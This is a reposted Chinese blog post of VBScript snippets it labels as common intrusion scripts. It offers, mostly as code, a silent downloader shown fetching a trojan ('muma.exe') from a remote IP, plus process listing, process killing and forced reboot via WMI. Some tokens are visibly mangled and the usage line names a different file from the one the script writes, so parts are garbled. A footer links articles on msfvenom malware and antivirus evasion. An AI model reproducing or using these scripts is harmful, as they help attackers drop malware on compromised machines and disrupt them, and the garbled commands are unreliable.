入侵常用vbs脚本 建议收藏

简介:
1.文件下载(无回显) 
echo iLocal = LCase(Wwww.Arguments(1)) >iget.vbe 
echo iRemote = LCase(Wwww.Arguments(0)) >>iget.vbe 
echo Set xPost = CreateObject("Microsoft.XMLHTTP") >>iget.vbe 
echo xPost.Open "GET",iRemote,0 >>iget.vbe 
echo xPost.Send() >>iget.vbe 
echo Set sGet = CreateObject("ADODB.Stream") >>iget.vbe 
echo sGet.Mode = 3 >>iget.vbe 
echo sGet.Type = 1 >>iget.vbe 
echo sGet.Open() >>iget.vbe 
echo sGet.Write(xPost.responseBody) >>iget.vbe 
echo sGet.SaveToFile iLocal,2 >>iget.vbe 

用法: cwww hget.vbs http://111.111.111.111/muma.exe muma.exe 


2.列举进程 
@echo for each ps in getobject _ >ps.vbs 
@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_ >>ps.vbs 
@echo wwww.echo ps.handle^&vbtab^&ps.name^&vbtab^&p*.**ecutablepath:next >>ps.vbs 

用法:cwww ps.vbs 


3.终止进程 
@echo for each ps in getobject _ >pskill.vbs 
@echo ("winmgmts:\\.\root\cimv2:win32_process").instances_ >>pskill.vbs 
@echo if ps.handle=wwww.arguments(0) then wwww.echo ps.terminate:end if:next >>pskill.vbs 

用法:cwww pskill.vbs pid 


4.重启系统 
@echo for each os in getobject _ >reboot.vbs 
@echo ("winmgmts:!\\.\root\cimv2:win32_operatingsystem").instances_ >>reboot.vbs 
@echo os.win32shutdown(2):next >>reboot.vbs 

用法:cwww reboot.vbs

















本文转sinojelly51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/338196,如需转载请自行联系原作者

相关文章
|
4月前
|
安全 Shell Windows
基于Metasploit利于msfvenom生成恶意软件获取shell
基于Metasploit利于msfvenom生成恶意软件获取shell
25 0
|
11月前
|
数据安全/隐私保护
Powershell免杀系列(二)
Powershell免杀系列(二)
265 0
|
安全 Shell Linux
PowerShell攻击指南
PowerShell攻击指南
208 0
|
安全 Shell 网络安全
渗透测试-模拟黑客给软件加上后门获取shell
渗透测试-模拟黑客给软件加上后门获取shell
渗透测试-模拟黑客给软件加上后门获取shell
|
安全 Shell
简单防御黑客DOS攻击shell脚本
简单防御黑客DOS攻击shell脚本
170 0
|
数据安全/隐私保护 JavaScript Java